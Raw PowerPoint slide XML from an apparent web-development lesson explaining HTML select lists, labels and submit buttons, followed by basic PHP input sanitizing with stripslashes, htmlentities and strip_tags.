            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The &lt;select&gt; tag lets you create a drop-down list of options, offering either single or multiple selections. It conforms to the following syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;select name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" size="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" multiple="multiple"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attribute size is the number of lines to display. Clicking on the display causes a list to drop down, showing all the options. If you use the multiple attribute, a user can select multiple options from the list by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>pressing the Ctrl key when clicking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3235365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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;select name="veg" size="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Peas"&gt;Peas&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Beans"&gt;Beans&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Carrots"&gt;Carrots&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Cabbage"&gt;Cabbage&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Broccoli"&gt;Broccoli&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This HTML offers five choices, with the first one, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Peas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, preselected (due to it being the first item). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you want to have a different default option offered first (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Beans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), use the &lt;selected&gt; tag, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option selected="selected" value="Beans"&gt;Beans&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C496E16D-6840-4453-856F-C66E4F60729C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955561" y="1683659"/>
            <a:ext cx="2876550" cy="1762125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="878334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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also allow users to select more than one item.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;select name="veg" size="5" multiple="multiple"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Peas"&gt;Peas&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Beans"&gt;Beans&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Carrots"&gt;Carrots&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Cabbage"&gt;Cabbage&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;option value="Broccoli"&gt;Broccoli&lt;/option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This HTML is not very different; only the size has been changed to "5" and the attribute multiple has been added. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can leave out the size attribute if you wish, and the output will be the same; however, with a larger list, the drop-down box might take up too much screen space, so I recommend that you pick a suitable number of rows and stick with it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93566B05-BB88-451D-A7CD-7CA147F0672B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7747624" y="2366114"/>
            <a:ext cx="3281243" cy="1674944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36247482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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Labels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can provide an even better user experience by utilizing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;label&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tag. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With it, you can surround a form element, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>making it selectable by clicking any visible part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contained between the opening and closing &lt;label&gt; tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, going back to the example of choosing a delivery time, you could allow the user to click the radio button itself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the associated text, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;label&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8am-Noon&lt;input type="radio" name="time" value="1"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/label&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The text will not be underlined like a hyperlink when you do this, but as the mouse passes over, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>it will change to an arrow instead of a text cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, indicating that the whole item is clickable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="763631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Input Types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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The submit button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To match the type of form being submitted, you can change the text of the submit button to anything you like by using the value attribute, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="submit" value="Search"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also replace the standard text button with a graphic image of your choice, using HTML such as this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="image" name="submit" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="image.gif"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1853352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Something more on sanitizing the inputs</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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To get rid of unwanted slashes, use this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$variable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($variable);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And to remove any HTML from a string, use the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$variable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($variable);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, this would change a string of interpretable HTML code like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;b&gt;hi&lt;/b&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;b&amp;gt;hi&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which displays as text, and won’t be interpreted as HTML tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, if you wish to strip HTML entirely from an input, use the following (but ensure you use it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which replaces any angle brackets used as part of HTML tags):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$variable = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($variable);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3413657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254833"/>
            <a:ext cx="10515600" cy="6603167"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="2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sanitizeString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a: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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
